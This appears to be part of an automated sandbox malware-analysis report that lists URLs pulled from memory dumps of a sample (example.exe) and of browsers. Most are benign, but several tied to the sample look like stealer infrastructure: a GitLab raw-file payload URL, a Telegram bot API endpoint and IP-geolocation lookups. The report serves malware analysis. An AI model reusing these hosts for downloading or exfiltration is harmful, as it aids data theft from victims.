                                                            http://anglebug.com/6929chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/mono/linker/pull/649example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://anglebug.com/5281chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://anglebug.com/4966chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://anglebug.com/7319chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://gitlab.com/app8490744/updatesa/-/raw/main/up$vq9JZUaS1Gy.docfalse
                                                                          		high
                                                                          https://issuetracker.google.com/255411748msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anglebug.com/5421chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://anglebug.com/7047chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ip-api.com/json/Pexample.exe, 0000000C.00000002.3645897805.0000019641CCD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://anglebug.com/7246chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://anglebug.com/7369chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://anglebug.com/7489chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://issuetracker.google.com/274859104msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://aka.ms/dotnet/download%s%sInstallexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                                                                                            		high
                                                                                            http://anglebug.com/6878chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://anglebug.com/6755chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://anglebug.com/6876chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://anglebug.com/7724chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aka.ms/dotnet-illink/comexample.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647365341.000001D6D4C56000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5AF6000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://issuetracker.google.com/161903006msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/7172chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.telegram.org/botPexample.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://ip-api.com/json/Ucountryexample.exe, 0000000C.00000002.3645791369.0000019641400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://anglebug.com/7899chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://api.ipify.org:Lexample.exe, 0000000C.00000002.3645791369.0000019641400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://anglebug.com/7279chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/3078chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/36253chrome.exe, 0000000E.00000002.3426348269.000033A8003A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://anglebug.com/7036chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://anglebug.com/7553chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://anglebug.com/5375chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/6860chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.catcert.net/verarrelmsedge.exe, 00000010.00000002.3518254671.00003A8400110000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://anglebug.com/5371chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://aka.ms/dotnet/sdk-not-foundProbingexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/4722chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/5658chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zexample.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/5535chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/4324chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://issuetracker.google.com/187425444msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://aka.ms/dotnet/downloadexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://anglebug.com/7036achrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://ip-api.com:80/(2example.exe, 0000000C.00000002.3645897805.0000019641CCD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://html4/loose.dtdexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/3584chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/4551chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/5881chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/59063chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/5906:msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://anglebug.com/6692chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://issuetracker.google.com/258207403msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://issuetracker.google.com/253522366msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://ocsp.sectigo.com0example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/3502chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/3623msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3625msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/3624msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/3586chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/5007chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
